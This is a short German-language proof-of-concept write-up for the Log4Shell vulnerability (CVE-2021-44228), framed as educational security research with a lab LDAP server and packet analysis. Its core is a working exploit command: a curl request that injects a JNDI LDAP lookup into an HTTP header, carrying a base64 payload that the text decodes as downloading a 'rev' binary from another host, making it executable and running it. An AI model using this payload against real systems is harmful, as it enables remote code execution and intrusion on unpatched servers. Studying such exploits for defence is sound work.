
Proof-of-concept-Exploit für Log4Shell (CVE-2021-44228) mit LDAP-Server-Einrichtung, Payload-Generierung und Paketerfassungsanalyse für die Sicherheitsforschung zu Bildungszwecken.
Log4Shell – auch bekannt als CVE-2021-44228 – ist eine kritische Schwachstelle, die die Remote-Codeausführung in Systemen ermöglicht, die Log4j der Apache Foundation verwenden, einer Open-Source-Java-Bibliothek, die häufig in kommerziellen und Open-Source-Softwareprodukten und -Dienstprogrammen eingesetzt wird.

POC-Analyse
Der anfällige Server läuft auf Port 8080.

Und der LDAP-Server läuft auf zwei Ports: http 8888 und ldap 1389.

EXPLOIT-BEFEHL
curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==}'
{
172.17.0.2:8080 -- IP des anfälligen Servers
172.17.0.1:1389 -- IP des LDAP-Servers
Base64 -- d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==
Entschlüsselter Befehl - wget https://10.0.2.15:8000/rev -O /tmp/rev && chmod +x /tmp/rev && /tmp/rev
}
PAKETANALYSE


WIE WIR IN DEN PAKETEN SEHEN KÖNNEN, SENDET DER SERVER EINE GET-ANFRAGE FÜR EINE KLASSE AN DEN LDAP-SERVER. WENN WIR DIE EXPLOIT-KLASSE ÜBERPRÜFEN, KÖNNEN WIR SEHEN, DASS DER LDAP-SERVER DEN ENTSCHLÜSSELTEN BEFEHL IN DER EXPLOIT-KLASSE SENDET.

Ref